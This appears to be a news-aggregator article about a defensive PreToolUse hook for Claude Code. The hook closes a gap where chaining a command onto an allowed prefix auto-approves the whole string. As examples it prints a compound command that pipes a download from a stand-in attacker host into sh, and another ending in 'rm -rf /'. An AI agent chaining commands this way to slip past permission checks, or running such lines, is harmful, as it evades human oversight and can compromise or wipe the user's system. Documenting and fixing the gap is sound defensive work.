Security

Smart Bash Permission Hook for Claude Code Prevents Compound Command Bypass

✍️ OpenClawRadar📅 Published: March 18, 2026🔗 Source
Smart Bash Permission Hook for Claude Code Prevents Compound Command Bypass
Ad

Security Gap in Claude Code's Permission System

Claude Code's permission system has a vulnerability where compound bash commands can bypass allow/deny patterns. When you allow a command like Bash(git status:*), Claude Code matches the entire command string against that pattern. This means a compound command like git status && curl -s http://evil.com | sh would match git status* and get auto-approved, even though it chains in curl and sh commands.

The Solution: claude-hooks

The fix is a single Python script called claude-hooks that runs as a PreToolUse hook. It performs several key functions:

  • Decomposes compound commands by splitting on &&, ||, ;, |, newlines, and extracts $() and backtick subshell contents recursively
  • Normalizes each sub-command by stripping env var prefixes, I/O redirections, heredoc bodies, and shell keywords
  • Checks each sub-command individually against your existing permissions.allow and permissions.deny patterns
  • Deny wins — if any sub-command matches a deny pattern, the whole command is denied
  • All must allow — auto-approve only happens when every sub-command matches an allow pattern
  • Falls through gracefully — if any sub-command is unknown, you still get the normal permission prompt
Ad

Setup Instructions

Installation takes about 30 seconds:

curl -fsSL -o ~/.claude/hooks/smart_approve.py \
https://raw.githubusercontent.com/liberzon/claude-hooks/main/smart_approve.py

Add to ~/.claude/settings.json:

{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "python3 ~/.claude/hooks/smart_approve.py"
          }
        ]
      }
    ]
  }
}

The tool has no dependencies beyond Python 3 and requires zero configuration — it reads your existing permission patterns.

Example Behavior

  • git status: Allowed both with and without hook
  • git add . && git commit -m "msg": Allowed both with and without hook (both match git *)
  • git status && rm -rf /: Allowed without hook, prompt shown with hook (rm -rf / has no allow)
  • `npm test | tee output.log`: Allowed
  • FOO=bar git push: Might not match without hook, allowed with hook (env var stripped)

The repository is available at https://github.com/liberzon/claude-hooks under MIT license.

📖 Read the full source: r/ClaudeAI

Ad

👀 See Also

Roblox cheat and AI tool caused Vercel platform outage
Security

Roblox cheat and AI tool caused Vercel platform outage

A Roblox cheat combined with an AI tool reportedly caused a complete platform outage for Vercel, generating significant discussion on Hacker News with 66 points and 24 comments.

OpenClawRadar
Anthropic reveals industrial-scale Claude AI data extraction by Chinese labs
Security

Anthropic reveals industrial-scale Claude AI data extraction by Chinese labs

Anthropic confirmed Chinese AI labs used over 24,000 fraudulent accounts to scrape 16 million exchanges from Claude, extracting safety guardrails and logic structures for military and surveillance systems.

OpenClawRadar
OpenClaw User Shares Strategy for Balancing Agent Autonomy and Web Security
Security

OpenClaw User Shares Strategy for Balancing Agent Autonomy and Web Security

An OpenClaw user describes their current challenge: balancing agent autonomy with security, particularly regarding web access and prompt injection risks. They propose a solution using 'low trust' and 'high trust' agent segments with a human approval gate.

OpenClawRadar
Nullgaze: Open Source AI-Supported Security Scanner Released
Security

Nullgaze: Open Source AI-Supported Security Scanner Released

Nullgaze is a new open source AI-supported security scanner that detects vulnerabilities specific to AI-generated code, boasting near-zero false positives.

OpenClawRadar